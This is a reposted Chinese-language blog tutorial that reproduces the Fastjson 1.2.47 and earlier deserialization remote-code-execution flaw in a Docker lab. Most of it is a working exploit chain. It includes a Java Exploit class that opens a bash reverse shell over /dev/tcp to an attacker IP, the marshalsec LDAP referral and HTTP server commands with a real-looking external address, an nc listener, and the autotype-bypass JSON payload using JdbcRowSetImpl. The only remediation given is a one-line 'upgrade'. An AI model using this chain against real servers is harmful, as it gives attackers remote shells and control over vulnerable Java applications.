码上快乐

相关内容   简体   繁体

Fastjson<=1.2.47反序列化漏洞复现

本文转载自  查看原文  2020-04-29 16:54  1458    08、{ 渗透测试

0x01 简介

fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。

0x02 漏洞概述

首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

0x03 影响版本

Fastjson1.2.47以及之前的版本

0x04 环境搭建

docker pull initidc/fastjson1.2.47_rce

tools

jdk8u181、marshalsec、Fastjson1.2.47

0x05 漏洞利用

1、编译生成Exploit.class

首先将以下代码保存为Exploit.java(反弹shell命令在代码内,可自行调整)

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/xx.xx.xx.xx/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

然后编译Exploit.java(javac Exploit.java)会生成一个Exploit.class文件
将编译生成的Exploit.class文件放至web目录下,即浏览器访问会下载

2、开启三个监听窗口

第一个,使用python搭建一个临时的web服务

python -m SimpleHTTPServer  8083

Ps:此步是为了接收LDAP服务重定向请求,需要在payload的目录下开启此web服务,这样才可以访问到payload文件
第二个,服务器使用marshalsec开启LDAP服务监听:

[root@master heixiuheixiu]# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://39.105.143.130:8083/#Exploit 9999
Listening on 0.0.0.0:9999

Ps:使用marshalsec工具快捷的开启LDAP服务,借助LDAP服务将LDAP reference result 重定向到web服务器

第三个,nc监听

nc -lvp 1888

Ps:这是最终得到shell的窗口

访问fastjson页面Burp发包,改为POST请求,使用EXP

{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://ip:9999/Exploit",
        "autoCommit":true
    }
 
}

发送后可以看到第三个窗口成功得到shell

0x06 修复方式

升级到最新版本!


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 Fastjson1.2.47反序列化+环境搭建+漏洞复现 fastjson<=1.2.47反序列化RCE漏洞 fastjson <= 1.2.47反序列化入侵复现 fastjson反序列化复现 Fastjson反序列化漏洞 Fastjson 1.2.24、47 反序列化导致任意命令执行漏洞复现 fastjson 反序列化漏洞笔记,比较乱 Fastjson反序列化漏洞利用分析 最新fastjson反序列化漏洞分析 Fastjson 1.2.24 反序列化漏洞研究
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM